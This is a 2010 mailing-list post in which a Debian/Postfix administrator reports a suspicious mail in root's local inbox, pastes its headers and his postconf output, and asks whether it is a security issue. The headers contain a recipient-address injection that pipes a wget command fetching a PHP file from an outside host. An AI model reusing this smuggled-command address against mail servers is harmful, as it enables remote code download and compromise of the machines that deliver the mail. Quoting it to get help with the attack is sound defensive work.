Hi, I just received the following mail in my root account's local inbox:
>From b...@dick.com Fri Apr 9 17:54:55 2010 Return-Path: <b...@dick.com> X-Original-To: "root+:|wget http://fortunes.in/x1x.php"; Delivered-To: "root+:|wget http://fortunes.in/x1x.php"@somedomain.de Received: from bluedick (unknown [208.88.6.50]) by mail.somedomain.de (Postfix) with SMTP id 800FC35405B for <"root+:|wget http://fortunes.in/x1x.php";>; Fri, 9 Apr 2010 17:54:55 +0200 (CEST) Message-Id: <20100409155455.800fc354...@mail.somedomain.de> Date: Fri, 9 Apr 2010 17:54:55 +0200 (CEST) From: b...@dick.com To: undisclosed-recipients:; Status: RO This appears to be some kind of attack (possibly not specifically aimed at postfix), that tries to exploit some mailer problem and trick the system into executing a command (wget). I can not tell for sure if it succeeded, at least I did not find an "x1x*" file anywhere on my system. However, at least it succeeded in one thing, that is tricking out the "aliases" mechanism. Normally, mail to root on my system is forwarded to an external address as per: root: u...@somedomain.cx in /etc/aliases In this case, however, the mail landed in my local inbox, so it appears in this case postfix did not do what it was supposed to do. Can anyone tell if this is something that should be addressed as a security issue? Can this kind of attack potentially do any harm other than deliver mail to the local inbox? Here are some system parameters: I am running debian 5.0.4, postfix 2.5.5-1.1. Here is my postconf -n: alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix inet_interfaces = all mailbox_size_limit = 0 mydestination = somedomain.de,someotherdomain.de,localhost.localdomain,localhost myhostname = mail.somedomain.de mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + relayhost = smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache smtpd_banner = $myhostname ESMTP smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache smtpd_use_tls = yes Regards, Arno -- Arno Schäfer IT-Beratung & Softwareentwicklung PHP - Java - Web-Anwendungen Linux/Unix - MySQL - Hochverfügbarkeit - Security Weilbornstraße 10 - 63303 Dreieich mailto: arno_schae...@gmx.de Tel. +49-6103-699967 | Mobil +49-171-7939236
